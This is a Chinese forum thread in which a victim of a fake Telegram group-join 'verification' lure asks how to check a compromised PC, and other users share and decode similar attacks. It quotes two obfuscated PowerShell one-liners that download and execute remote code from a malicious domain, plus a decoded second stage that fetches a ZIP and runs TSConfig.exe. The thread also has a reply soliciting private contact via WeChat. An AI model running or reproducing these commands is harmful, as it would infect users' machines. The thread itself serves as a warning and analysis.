感觉自己系统肯定被黑了，但是用杀毒软件没报毒，也没查出来

前天在一个大V评论里看到一个进群的消息，还说人数有限，就大意直接点击了，点了之后又要各种验证，最后不知不觉自己的粘贴板就复制了一段代码。

然后按照提示，需要win+r，复制，确定，就能通过验证进群，结果都做了最后就是闪了一下，也进不了群，还试了好多次都不行，最后才感觉自己被黑了。

就这样不知不觉就运行了病毒代码，可能通过代码下载了什么东西并安装了什么程序，但是全程没有杀毒警报，全盘查杀也没有看到相关的病毒。

但是感觉系统还是不安全，无耐过来请大神把把关，看要怎么查到这段代码具体干了什么，已经怎么去掉之后的隐患，代码如下：

powershell -w hidden -c $r='==Ad4RnL59SZmlGbuEncr9yL6MHc0RHa';$u=($r[-1..-($r.Length)]-join '');&($u|%{&('iwr') ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($_)))|&('iex')}); # ⠀Telegram⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

网上查了一下自己要怎么查，查到相关的时间日志，但是自己不是专业的，越查越晕，所以才来找大神，如果需要，运行日志也可以提供。看相关评论，有不少人也中了类似的套路，希望能用自己的例子避免更多人受害。

典型的钓鱼引导用户PowerShell在后台执行（理论上第一步操作，系统就会有安全提示或者360安全卫士就会有相关的提示，毕竟这是高危动作，楼主应该没注意到或者忽略跳过了），这段恶意操作的脚本，执行自身加密字符串并从网络上下载并执行代码来实施攻击。已经中招的情况下，建议楼主使用360安全卫士的防黑加固功能检查系统安全薄弱项目，关闭一些不常用的端口，同时急救箱全盘扫描看看是否有落地的恶意文件。

到底是什么群输入代码才能进？看上文是纸飞机群吗？以后该怎样防范？

加下我的微信jwwdzrhb，我帮您看下

我跟你一样的情况,一个叫Safeguard的群组 要我验证真人.
让我执行WIN+R 进行验证, 发现的恶意代码如下:
powershell -w hidden -c $a='aHR0cHM6Ly9nZW5lcmFsc2thbHNrLm5ldC9hcy50eHQ=';$b=[Convert]::FromBase64String($a);$c=[System.Text.Encoding]::UTF8.GetString($b);$d="iwr $c | iex";Invoke-Expression $d; #⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀Telegram⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

经过chatgpt分析,他执行了https://    generalskalsk.net/as.txt里的代码,
$r.u = "aHR0cHM6Ly9nZW5lcmFsc2thbHNrLm5ldC8xLTcyMzYyODMxMi85OTQ1Njg0NTYyMzQyMy1uYW5hLnppcA=="
$r.z = "ZG93bmxvYWQxLnppcA=="
$r.x = "ZXh0cmFjdDE="
$r.e = "VFNDb25maWcuZXhl"
解码结果：
$r.u -> https://    generalskalsk.net/1-723628312/99456845623423-nana.zip （下载的 ZIP 文件 URL）。
$r.z -> download1.zip （下载后的文件名）。
$r.x -> extract1 （解压目标目录）。
$r.e -> TSConfig.exe （解压后执行的可执行文件名）

解码后通知 URL 为：https://   generalskalsk.net/2-912381232/sendNotification.php
通知内容是：PowerShell script executed successfully.